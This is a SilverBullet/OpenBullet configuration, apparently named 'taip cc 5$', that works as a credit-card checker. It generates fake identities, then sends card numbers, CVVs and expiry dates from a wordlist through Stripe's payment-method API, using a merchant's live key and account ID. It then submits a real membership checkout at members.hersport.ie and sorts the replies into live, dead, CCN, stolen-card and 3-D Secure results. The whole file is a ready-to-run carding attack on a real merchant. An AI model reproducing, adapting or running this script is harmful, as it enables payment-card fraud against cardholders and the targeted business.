[SETTINGS]
{
  "Name": "taip cc 5$",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2023-05-09T17:29:52.2016327+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "1$REQ",
  "AllowedWordlist2": "1$REQ",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "taip cc 5$",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://randomuser.me/api?results=1&gender=&password=upper,lower,12&exc=register,picture,id&nat=us" 
  

#F PARSE "<SOURCE>" LR "\"first\":\"" "\"" -> VAR "F" 

#L PARSE "<SOURCE>" LR "\"last\":\"" "\"}" -> VAR "L" 

#FULL_NAME FUNCTION Constant "<F> <L>" -> VAR "fullname" 

#email FUNCTION RandomString "?l?l?l?l?l-14?l?l?l@gmail.com" -> VAR "emai" 

FUNCTION URLEncode "<emai>" -> VAR "email" 

#streetnum PARSE "<SOURCE>" LR "\"location\":{\"street\":{\"number\":" "," -> VAR "SNUM" 

#StreetName PARSE "<SOURCE>" LR "\"name\":\"" "\"}" -> VAR "StreetName" 

#Street FUNCTION Constant "<SNUM> <StreetName>" -> VAR "Street" 

#City PARSE "<SOURCE>" LR "\"city\":\"" "\"" -> VAR "City" 

#state PARSE "<SOURCE>" LR "\"state\":\"" "\"" -> VAR "state" 

#stacod FUNCTION Translate 
  KEY "Alabama" VALUE "AL" 
  KEY "Alaska" VALUE "AK" 
  KEY "American Samoa" VALUE "AS" 
  KEY "Arizona" VALUE "AZ" 
  KEY "Arkansas" VALUE "AR" 
  KEY "California" VALUE "CA" 
  KEY "Colorado" VALUE "CO" 
  KEY "Connecticut" VALUE "CT" 
  KEY "Delaware" VALUE "DE" 
  KEY "District Of Columbia" VALUE "DC" 
  KEY "Federated States Of Micronesia" VALUE "FM" 
  KEY "Florida" VALUE "FL" 
  KEY "Georgia" VALUE "GA" 
  KEY "Guam" VALUE "GU" 
  KEY "Hawaii" VALUE "HI" 
  KEY "Idaho" VALUE "ID" 
  KEY "Illinois" VALUE "IL" 
  KEY "Indiana" VALUE "IN" 
  KEY "Iowa" VALUE "IA" 
  KEY "Kansas" VALUE "KS" 
  KEY "Kentucky" VALUE "KY" 
  KEY "Louisiana" VALUE "LA" 
  KEY "Maine" VALUE "ME" 
  KEY "Marshall Islands" VALUE "MH" 
  KEY "Maryland" VALUE "MD" 
  KEY "Massachusetts" VALUE "MA" 
  KEY "Michigan" VALUE "MI" 
  KEY "Minnesota" VALUE "MN" 
  KEY "Mississippi" VALUE "MS" 
  KEY "Missouri" VALUE "MO" 
  KEY "Montana" VALUE "MT" 
  KEY "Nebraska" VALUE "NE" 
  KEY "Nevada" VALUE "NV" 
  KEY "New Hampshire" VALUE "NH" 
  KEY "New Jersey" VALUE "NJ" 
  KEY "New Mexico" VALUE "NM" 
  KEY "New York" VALUE "NY" 
  KEY "North Carolina" VALUE "NC" 
  KEY "North Dakota" VALUE "ND" 
  KEY "Northern Mariana Islands" VALUE "MP" 
  KEY "Ohio" VALUE "OH" 
  KEY "Oklahoma" VALUE "OK" 
  KEY "Oregon" VALUE "OR" 
  KEY "Palau" VALUE "PW" 
  KEY "Pennsylvania" VALUE "PA" 
  KEY "Puerto Rico" VALUE "PR" 
  KEY "Rhode Island" VALUE "RI" 
  KEY "South Carolina" VALUE "SC" 
  KEY "South Dakota" VALUE "SD" 
  KEY "Tennessee" VALUE "TN" 
  KEY "Texas" VALUE "TX" 
  KEY "Utah" VALUE "UT" 
  KEY "Vermont" VALUE "VT" 
  KEY "Virgin Islands" VALUE "VI" 
  KEY "Virginia" VALUE "VA" 
  KEY "Washington" VALUE "WA" 
  KEY "West Virginia" VALUE "WV" 
  KEY "Wisconsin" VALUE "WI" 
  KEY "Wyoming" VALUE "WY" 
  "<state>" -> VAR "stacod" 

#postcode PARSE "<SOURCE>" LR "\"postcode\":" "," -> VAR "zip" 

#Phone PARSE "<SOURCE>" JSON "phone" -> VAR "phone" 

#COD PARSE "<SOURCE>" LR "\"country\":\"" "\"" -> VAR "COD" 

#Country FUNCTION Translate 
  KEY "Afghanistan" VALUE "AF" 
  KEY "Åland Islands" VALUE "AX" 
  KEY "Albania" VALUE "AL" 
  KEY "Algeria" VALUE "DZ" 
  KEY "American Samoa" VALUE "AS" 
  KEY "Andorra" VALUE "AD" 
  KEY "Angola" VALUE "AO" 
  KEY "Anguilla" VALUE "AI" 
  KEY "Antarctica" VALUE "AQ" 
  KEY "Antigua and Barbuda" VALUE "AG" 
  KEY "Argentina" VALUE "AR" 
  KEY "Armenia" VALUE "AM" 
  KEY "Aruba" VALUE "AW" 
  KEY "Australia" VALUE "AU" 
  KEY "Austria" VALUE "AT" 
  KEY "Azerbaijan" VALUE "AZ" 
  KEY "Bahamas" VALUE "BS" 
  KEY "Bahrain" VALUE "BH" 
  KEY "Bangladesh" VALUE "BD" 
  KEY "Barbados" VALUE "BB" 
  KEY "Belarus" VALUE "BY" 
  KEY "Belgium" VALUE "BE" 
  KEY "Belize" VALUE "BZ" 
  KEY "Benin" VALUE "BJ" 
  KEY "Bermuda" VALUE "BM" 
  KEY "Bhutan" VALUE "BT" 
  KEY "Bolivia" VALUE "Plurinational State of: BO" 
  KEY "Bonaire" VALUE "Sint Eustatius and Saba: BQ" 
  KEY "Bosnia and Herzegovina" VALUE "BA" 
  KEY "Botswana" VALUE "BW" 
  KEY "Bouvet Island" VALUE "BV" 
  KEY "Brazil" VALUE "BR" 
  KEY "British Indian Ocean Territory" VALUE "IO" 
  KEY "Brunei Darussalam" VALUE "BN" 
  KEY "Bulgaria" VALUE "BG" 
  KEY "Burkina Faso" VALUE "BF" 
  KEY "Burundi" VALUE "BI" 
  KEY "Cambodia" VALUE "KH" 
  KEY "Cameroon" VALUE "CM" 
  KEY "Canada" VALUE "CA" 
  KEY "Cape Verde" VALUE "CV" 
  KEY "Cayman Islands" VALUE "KY" 
  KEY "Central African Republic" VALUE "CF" 
  KEY "Chad" VALUE "TD" 
  KEY "Chile" VALUE "CL" 
  KEY "China" VALUE "CN" 
  KEY "Christmas Island" VALUE "CX" 
  KEY "Cocos (Keeling) Islands" VALUE "CC" 
  KEY "Colombia" VALUE "CO" 
  KEY "Comoros" VALUE "KM" 
  KEY "Congo" VALUE "the Democratic Republic of the: CD" 
  KEY "Cook Islands" VALUE "CK" 
  KEY "Costa Rica" VALUE "CR" 
  KEY "Côte d'Ivoire" VALUE "CI" 
  KEY "Croatia" VALUE "HR" 
  KEY "Cuba" VALUE "CU" 
  KEY "Curaçao" VALUE "CW" 
  KEY "Cyprus" VALUE "CY" 
  KEY "Czech Republic" VALUE "CZ" 
  KEY "Denmark" VALUE "DK" 
  KEY "Djibouti" VALUE "DJ" 
  KEY "Dominica" VALUE "DM" 
  KEY "Dominican Republic" VALUE "DO" 
  KEY "Ecuador" VALUE "EC" 
  KEY "Egypt" VALUE "EG" 
  KEY "El Salvador" VALUE "SV" 
  KEY "Equatorial Guinea" VALUE "GQ" 
  KEY "Eritrea" VALUE "ER" 
  KEY "Estonia" VALUE "EE" 
  KEY "Ethiopia" VALUE "ET" 
  KEY "Falkland Islands (Malvinas)" VALUE "FK" 
  KEY "Faroe Islands" VALUE "FO" 
  KEY "Fiji" VALUE "FJ" 
  KEY "Finland" VALUE "FI" 
  KEY "France" VALUE "FR" 
  KEY "French Guiana" VALUE "GF" 
  KEY "French Polynesia" VALUE "PF" 
  KEY "French Southern Territories" VALUE "TF" 
  KEY "Gabon" VALUE "GA" 
  KEY "Gambia" VALUE "GM" 
  KEY "Georgia" VALUE "GE" 
  KEY "Germany" VALUE "DE" 
  KEY "Ghana" VALUE "GH" 
  KEY "Gibraltar" VALUE "GI" 
  KEY "Greece" VALUE "GR" 
  KEY "Greenland" VALUE "GL" 
  KEY "Grenada" VALUE "GD" 
  KEY "Guadeloupe" VALUE "GP" 
  KEY "Guam" VALUE "GU" 
  KEY "Guatemala" VALUE "GT" 
  KEY "Guernsey" VALUE "GG" 
  KEY "Guinea" VALUE "GN" 
  KEY "Guinea-Bissau" VALUE "GW" 
  KEY "Guyana" VALUE "GY" 
  KEY "Haiti" VALUE "HT" 
  KEY "Heard Island and McDonald Islands" VALUE "HM" 
  KEY "Holy See (Vatican City State)" VALUE "VA" 
  KEY "Honduras" VALUE "HN" 
  KEY "Hong Kong" VALUE "HK" 
  KEY "Hungary" VALUE "HU" 
  KEY "Iceland" VALUE "IS" 
  KEY "India" VALUE "IN" 
  KEY "Indonesia" VALUE "ID" 
  KEY "Iran" VALUE "Islamic Republic of: IR" 
  KEY "Iraq" VALUE "IQ" 
  KEY "Ireland" VALUE "IE" 
  KEY "Isle of Man" VALUE "IM" 
  KEY "Israel" VALUE "IL" 
  KEY "Italy" VALUE "IT" 
  KEY "Jamaica" VALUE "JM" 
  KEY "Japan" VALUE "JP" 
  KEY "Jersey" VALUE "JE" 
  KEY "Jordan" VALUE "JO" 
  KEY "Kazakhstan" VALUE "KZ" 
  KEY "Kenya" VALUE "KE" 
  KEY "Kiribati" VALUE "KI" 
  KEY "Korea" VALUE "Republic of: KR" 
  KEY "Kuwait" VALUE "KW" 
  KEY "Kyrgyzstan" VALUE "KG" 
  KEY "Lao People's Democratic Republic" VALUE "LA" 
  KEY "Latvia" VALUE "LV" 
  KEY "Lebanon" VALUE "LB" 
  KEY "Lesotho" VALUE "LS" 
  KEY "Liberia" VALUE "LR" 
  KEY "Libya" VALUE "LY" 
  KEY "Liechtenstein" VALUE "LI" 
  KEY "Lithuania" VALUE "LT" 
  KEY "Luxembourg" VALUE "LU" 
  KEY "Macao" VALUE "MO" 
  KEY "Macedonia" VALUE "the Former Yugoslav Republic of: MK" 
  KEY "Madagascar" VALUE "MG" 
  KEY "Malawi" VALUE "MW" 
  KEY "Malaysia" VALUE "MY" 
  KEY "Maldives" VALUE "MV" 
  KEY "Mali" VALUE "ML" 
  KEY "Malta" VALUE "MT" 
  KEY "Marshall Islands" VALUE "MH" 
  KEY "Martinique" VALUE "MQ" 
  KEY "Mauritania" VALUE "MR" 
  KEY "Mauritius" VALUE "MU" 
  KEY "Mayotte" VALUE "YT" 
  KEY "Mexico" VALUE "MX" 
  KEY "Micronesia" VALUE "Federated States of: FM" 
  KEY "Moldova" VALUE "Republic of: MD" 
  KEY "Monaco" VALUE "MC" 
  KEY "Mongolia" VALUE "MN" 
  KEY "Montenegro" VALUE "ME" 
  KEY "Montserrat" VALUE "MS" 
  KEY "Morocco" VALUE "MA" 
  KEY "Mozambique" VALUE "MZ" 
  KEY "Myanmar" VALUE "MM" 
  KEY "Namibia" VALUE "NA" 
  KEY "Nauru" VALUE "NR" 
  KEY "Nepal" VALUE "NP" 
  KEY "Netherlands" VALUE "NL" 
  KEY "New Caledonia" VALUE "NC" 
  KEY "New Zealand" VALUE "NZ" 
  KEY "Nicaragua" VALUE "NI" 
  KEY "Niger" VALUE "NE" 
  KEY "Nigeria" VALUE "NG" 
  KEY "Niue" VALUE "NU" 
  KEY "Norfolk Island" VALUE "NF" 
  KEY "Northern Mariana Islands" VALUE "MP" 
  KEY "Norway" VALUE "NO" 
  KEY "Oman" VALUE "OM" 
  KEY "Pakistan" VALUE "PK" 
  KEY "Palau" VALUE "PW" 
  KEY "Palestine" VALUE "State of: PS" 
  KEY "Panama" VALUE "PA" 
  KEY "Papua New Guinea" VALUE "PG" 
  KEY "Paraguay" VALUE "PY" 
  KEY "Peru" VALUE "PE" 
  KEY "Philippines" VALUE "PH" 
  KEY "Pitcairn" VALUE "PN" 
  KEY "Poland" VALUE "PL" 
  KEY "Portugal" VALUE "PT" 
  KEY "Puerto Rico" VALUE "PR" 
  KEY "Qatar" VALUE "QA" 
  KEY "Réunion" VALUE "RE" 
  KEY "Romania" VALUE "RO" 
  KEY "Russian Federation" VALUE "RU" 
  KEY "Rwanda" VALUE "RW" 
  KEY "Saint Barthélemy" VALUE "BL" 
  KEY "Saint Helena" VALUE "Ascension and Tristan da Cunha: SH" 
  KEY "Saint Kitts and Nevis" VALUE "KN" 
  KEY "Saint Lucia" VALUE "LC" 
  KEY "Saint Martin (French part)" VALUE "MF" 
  KEY "Saint Pierre and Miquelon" VALUE "PM" 
  KEY "Saint Vincent and the Grenadines" VALUE "VC" 
  KEY "Samoa" VALUE "WS" 
  KEY "San Marino" VALUE "SM" 
  KEY "Sao Tome and Principe" VALUE "ST" 
  KEY "Saudi Arabia" VALUE "SA" 
  KEY "Senegal" VALUE "SN" 
  KEY "Serbia" VALUE "RS" 
  KEY "Seychelles" VALUE "SC" 
  KEY "Sierra Leone" VALUE "SL" 
  KEY "Singapore" VALUE "SG" 
  KEY "Sint Maarten (Dutch part)" VALUE "SX" 
  KEY "Slovakia" VALUE "SK" 
  KEY "Slovenia" VALUE "SI" 
  KEY "Solomon Islands" VALUE "SB" 
  KEY "Somalia" VALUE "SO" 
  KEY "South Africa" VALUE "ZA" 
  KEY "South Georgia and the South Sandwich Islands" VALUE "GS" 
  KEY "South Sudan" VALUE "SS" 
  KEY "Spain" VALUE "ES" 
  KEY "Sri Lanka" VALUE "LK" 
  KEY "Sudan" VALUE "SD" 
  KEY "Suriname" VALUE "SR" 
  KEY "Svalbard and Jan Mayen" VALUE "SJ" 
  KEY "Swaziland" VALUE "SZ" 
  KEY "Sweden" VALUE "SE" 
  KEY "Switzerland" VALUE "CH" 
  KEY "Syrian Arab Republic" VALUE "SY" 
  KEY "Taiwan" VALUE "Province of China: TW" 
  KEY "Tajikistan" VALUE "TJ" 
  KEY "Tanzania" VALUE "United Republic of: TZ" 
  KEY "Thailand" VALUE "TH" 
  KEY "Timor-Leste" VALUE "TL" 
  KEY "Togo" VALUE "TG" 
  KEY "Tokelau" VALUE "TK" 
  KEY "Tonga" VALUE "TO" 
  KEY "Trinidad and Tobago" VALUE "TT" 
  KEY "Tunisia" VALUE "TN" 
  KEY "Turkey" VALUE "TR" 
  KEY "Turkmenistan" VALUE "TM" 
  KEY "Turks and Caicos Islands" VALUE "TC" 
  KEY "Tuvalu" VALUE "TV" 
  KEY "Uganda" VALUE "UG" 
  KEY "Ukraine" VALUE "UA" 
  KEY "United Arab Emirates" VALUE "AE" 
  KEY "United Kingdom" VALUE "GB" 
  KEY "United States" VALUE "US" 
  KEY "United States Minor Outlying Islands" VALUE "UM" 
  KEY "Uruguay" VALUE "UY" 
  KEY "Uzbekistan" VALUE "UZ" 
  KEY "Vanuatu" VALUE "VU" 
  KEY "Venezuela" VALUE "Bolivarian Republic of: VE" 
  KEY "Viet Nam" VALUE "VN" 
  KEY "Virgin Islands" VALUE "U.S.: VI" 
  KEY "Wallis and Futuna" VALUE "WF" 
  KEY "Western Sahara" VALUE "EH" 
  KEY "Yemen" VALUE "YE" 
  KEY "Zambia" VALUE "ZM" 
  KEY "Zimbabwe" VALUE "ZW" 
  "<COD>" -> VAR "Country" 

#guid FUNCTION GenerateGUID "guid" -> VAR "guid" 

#muid FUNCTION GenerateGUID "muid" -> VAR "muid" 

#sid FUNCTION GenerateGUID "sid" -> VAR "sid" 

#time FUNCTION RandomString "?d?d?d?d?d" -> VAR "time" 

#stripe REQUEST POST "https://api.stripe.com/v1/payment_methods" 
  CONTENT "type=card&card[number]=<cc>&card[cvc]=<cvv>&card[exp_month]=<mes>&card[exp_year]=<ano>&guid=<guid>&muid<muid>&sid=<sid>&payment_user_agent=stripe.js%2F10cd000f18%3B+stripe-js-v3%2F10cd000f18&time_on_page=<time>&key=pk_live_1a4WfCRJEoV9QNmww9ovjaR2Drltj9JA3tJEWTBi4Ixmr8t3q5nDIANah1o0SdutQx4lUQykrh9bi3t4dR186AR8P00KY9kjRvX&_stripe_account=acct_1Gf1ZqLn8csgLdfg" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ar;q=0.8" 
  HEADER "content-length: 473" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://js.stripe.com" 
  HEADER "referer: https://js.stripe.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 

#pm PARSE "<SOURCE>" LR "\"id\": \"" "\"," -> VAR "pm" 

#brand PARSE "<SOURCE>" JSON "brand" -> VAR "brand" 

#last4 PARSE "<SOURCE>" JSON "last4" -> VAR "last4" 

#membership REQUEST POST "https://members.hersport.ie/membership-account/membership-checkout/" 
  CONTENT "level=1&checkjavascript=1&username=<L>&password=<COD>&password2=<COD>&bemail=<emai>&bconfirmemail=<emai>&fullname=&CardType=<brand>&submit-checkout=1&javascriptok=1&payment_method_id=<pm>&AccountNumber=XXXXXXXXXXXX<last4>&ExpirationMonth=<mes>&ExpirationYear=<ano>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: members.hersport.ie" 
  HEADER "Origin: https://members.hersport.ie" 
  HEADER "Referer: https://members.hersport.ie/membership-account/membership-checkout/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"112\", \"Google Chrome\";v=\"112\", \"Not:A-Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 

#Response PARSE "<SOURCE>" LR "pmpro_error\">" "</div>" -> VAR "Response" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "[#Dead]" 
    KEY "Your card number is incorrect." 
    KEY "Your card has expired" 
    KEY "expired_card" 
    KEY "Card is declined" 
    KEY "Your card does not support this type of purchase" 
    KEY "card_not_supported" 
    KEY "Your card is not supported." 
    KEY "Payment cannot be processed, missing card number" 
    KEY "transaction_not_allowed" 
    KEY "Your card was declined" 
    KEY "incorrect_number" 
    KEY "service_not_allowed" 
    KEY "do_not_honor" 
    KEY "generic_decline" 
    KEY "paraneter_invaild_empty" 
    KEY "lock_timeout" 
    KEY "Card is declined by your bank, please contact them for additional primaryrmation." 
    KEY "fraudulent" 
    KEY "was not found on this server." 
    KEY "paraneter_invaild_integer." 
    KEY "Your Card was declined" 
    KEY "Your card's expiration year is invaild." 
    KEY "Your account cannot currently make live charges." 
    KEY "invalid_request_error" 
    KEY "card_not_supported" 
    KEY "\"cvc_check\": null" 
    KEY "\"cvc_check\": \"unchecked\"" 
    KEY "declined_by_network" 
    KEY "CARD_DECLINE" 
    KEY "The credit card was declined. Please check the information that you entered." 
    KEY "{\"success\":false" 
    KEY "Your card was declined" 
  KEYCHAIN Success OR 
    KEY "[#Alive]" 
    KEY "[#CVV]" 
    KEY "https://pay.stripe.com/receipts/" 
    KEY "Payment successful" 
    KEY "approved_by_network" 
    KEY "\"cvc_check\": \"pass\"" 
    KEY "Thank You" 
    KEY "Thank you for supporting" 
    KEY "Payment successful" 
    KEY "Thank you for Your Donation!" 
    KEY "Merci" 
    KEY "Merci pour votre achat." 
    KEY "Your card has insufficient funds." 
  KEYCHAIN Custom "CCN" OR 
    KEY "Your card's security code is incorrect" 
    KEY "[#CCN]" 
  KEYCHAIN Custom "NFS" OR 
    KEY "stolen_card" 
    KEY "lost_card" 
  KEYCHAIN Custom "3DSECURE" OR 
    KEY "three_d_secure_redirect" 
    KEY "stripe_3ds2_fingerprint" 
    KEY "3d_secure_2" 
  KEYCHAIN Custom "RATE LIMIT" OR 
    KEY "\"code\":\"rate_limit" 
    KEY "Request rate limit exceeded." 
  KEYCHAIN Retry OR 
    KEY "This object cannot be accessed right now because another API request or Stripe process is currently accessing " 
    KEY "An error occurred while processing your card. Try again in a little bit." 
    KEY "We're sorry, but we're unable to serve your request." 
    KEY "The zip or postal code for your billing address." 
    KEY "The zip code you supplied failed validation" 

